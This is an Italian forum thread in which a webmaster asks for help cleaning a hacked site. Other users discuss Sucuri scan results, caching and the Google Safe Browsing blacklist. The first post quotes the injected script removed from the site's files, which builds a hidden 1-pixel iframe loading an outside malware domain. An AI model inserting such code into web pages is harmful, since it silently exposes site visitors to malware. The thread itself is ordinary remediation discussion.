Attacco malware prewhome.com

**TrainWeb** · 16-11-2012, 12.17.12

Buongiorno a tutti.
Sto combattendo da ieri nella pulizia dei file del codice maligno. Ho già rimosso il codice da un centinaio e più di file.

Codice:

<!--fff309--><script type="text/javascript" language="javascript" > (function () { var cjd = document.createElement('iframe'); cjd.src = 'http://prewhome.com/'; cjd.style.position = 'absolute'; cjd.style.border = '0'; cjd.style.height = '1px'; cjd.style.width = '1px'; cjd.style.left = '1px'; cjd.style.top = '1px'; if (!document.getElementById('cjd')) { document.write('<div id=\'cjd\'></div>'); document.getElementById('cjd').appendChild(cjd); }})();</script><!--/fff309-->

Ma nonostante ciò la scansione attraverso sucuri, indica ancora la presenza del malware, in alcuni file che, ricontrollandoli sono privi del codice indicato sopra, come è possibile che la scansione da ancora esito positivo? Come posso rimediare?
E' possibile che l'indicazione dei file infetti sia errata, cioè che si riferiscono ad altri files?

**dreadnaut** · 16-11-2012, 15.17.48

Ti sei assicurato che il tuo pc sia pulito?

**TrainWeb** · 16-11-2012, 15.21.40

Si è da ieri che sto facendo passate di antivirus, S&D combofix+ e malwarebyte...
Il problema è che la scansione di sucuri mi dice che lo script javascript è in quattro file ma io li ho riesaminati anche da un pc pulito e di quello script non c'è traccia.

**dreadnaut** · 16-11-2012, 15.55.37

Avrà problemi di cache anche lui magari

**TrainWeb** · 16-11-2012, 16.00.08

haahah speriamo che sia così, continua a darmi anche la presenza dello scrip nei file
soul_city / template / styleswitcher.js
soul_city / template / forum_fn.js
ma di quel codice malevolo non c'è traccia...

16-11-2012, 20.10.55

In questo momento Chrome mi segnala il tuo sito come contenente malware.
Sucuri lo segnala come pulito ma ancora presente nella blacklist di Google Safe Browsing.
Se quando fai lo scan tu con Sucuri risulta infetto il problema è la tua cache.
Devi contattare Google Safe Browsing per far rimuovere il sito dalla sua blacklist.

Ciao

**TrainWeb** · 16-11-2012, 22.21.40

Anche a me sucuri lo da come presente in balck list. Stranamente con IE il sito e visibile e funzionale

16-11-2012, 22.27.57

IE è un caso disperato, non prenderlo come punto di riferimento in queste circostanze.

**TrainWeb** · 16-11-2012, 22.53.07

Infatti da tempo non lo uso più, ma nella disperazione ho voluto provarlo.

Originalmente inviato da australiafever

IE è un caso disperato, non prenderlo come punto di riferimento in queste circostanze.

Discussione: Attacco malware prewhome.com

LinkBack

Strumenti discussione

Display

Attacco malware prewhome.com

Regole di scrittura